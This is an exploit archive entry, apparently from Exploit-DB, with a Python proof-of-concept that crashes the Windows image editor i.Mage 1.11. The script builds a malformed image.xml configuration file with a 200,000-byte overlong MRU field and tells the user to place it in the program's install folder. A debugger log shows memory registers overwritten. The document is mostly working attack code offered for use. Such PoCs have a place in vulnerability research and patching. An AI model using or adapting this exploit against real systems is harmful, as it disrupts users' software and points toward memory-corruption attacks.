i.Mage 1.11 - Local Crash (PoC)

EDB-ID:

35179

CVE:



Author:

metacom

Type:

dos


Platform:

Windows

Date:

2014-11-06


#!/usr/bin/python
#Exploit Title:i.Mage Local Crash Poc
#Homepage:http://www.memecode.com/image.php
#Software Link:http://sourceforge.net/projects/image-editor/files/i.mage-win32-v111.exe/download
#Version:i.i.Mage v1.11 (Win32 Release)
#Description:i.Mage is a small and fast graphics editor slanted towards quite and easy pixel editing...
#Tested on:Win7 32bit EN-Ultimate 
#Exploit Author: metacom
#Date:26.10.2014
'''
Immunity Debugger Log data
Address=77B85FBD
Message=[17:21:47] Access violation when reading [41414145]

EAX 01354078 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 41414141
EDX 41414141
EBX 01374F10
ESP 0012F810
EBP 0012F838
ESI 01354070 ASCII "AAAzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 003A0000
EIP 77B85FBD ntdll.77B85FBD'''
print "\n[*]Vulnerable Created image.xml!"
print "[*]Copy image.xml to C:\Program Files\Memecode\i.Mage"
print "[*]Start i.Mage"
print "[*]------------------------------------------------"

poc="\x41" * 200000
header  = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x4f\x70\x74\x69\x6f\x6e\x73\x20\x45\x72\x61\x73\x65\x57\x69\x64\x74\x68\x3d"
header += "\x22\x31\x30\x22\x0a\x09\x20\x45\x72\x61\x73\x65\x41\x6d\x6f\x75\x6e\x74\x3d\x22\x32\x35\x35\x22\x0a\x09\x20\x44\x73\x70"
header += "\x47\x72\x69\x64\x3d\x22\x31\x22\x0a\x09\x20\x54\x6f\x6f\x6c\x4f\x70\x65\x6e\x3d\x22\x30\x22\x0a\x09\x20\x41\x6e\x67\x6c"
header += "\x65\x3d\x22\x30\x22\x0a\x09\x20\x50\x6f\x73\x3d\x22\x37\x31\x37\x2c\x33\x34\x30\x2c\x31\x31\x31\x37\x2c\x36\x34\x30\x22"
header += "\x0a\x09\x20\x45\x6e\x61\x62\x6c\x65\x64\x55\x6e\x64\x6f\x3d\x22\x31\x22\x0a\x09\x20\x46\x69\x6c\x6c\x4f\x62\x6a\x65\x63"
header += "\x74\x73\x3d\x22\x31\x22\x0a\x09\x20\x54\x72\x61\x6e\x73\x70\x61\x72\x65\x6e\x74\x50\x61\x73\x74\x65\x3d\x22\x30\x22\x0a"
header += "\x09\x20\x4f\x70\x65\x72\x61\x74\x6f\x72\x3d\x22\x30\x22\x0a\x09\x20\x41\x6c\x70\x68\x61\x3d\x22\x32\x35\x35\x22\x0a\x09"
header += "\x20\x53\x70\x6c\x69\x74\x74\x65\x72\x50\x6f\x73\x3d\x22\x32\x35\x30\x22\x3e\x0a\x09\x3c\x4d\x72\x75\x20\x49\x74\x65\x6d"
header += "\x73\x3d\x22\x30\x22\x0a\x09\x09\x20\x49\x74\x65\x6d\x30\x3d\x22\x0a" + poc

footer = "\x22\x20\x2f\x3e\x0a\x3c\x2f\x4f\x70\x74\x69\x6f\x6e\x73\x3e\x0a"

payload=header + footer
writeFile = open ("image.xml", "w")
writeFile.write( payload )
writeFile.close()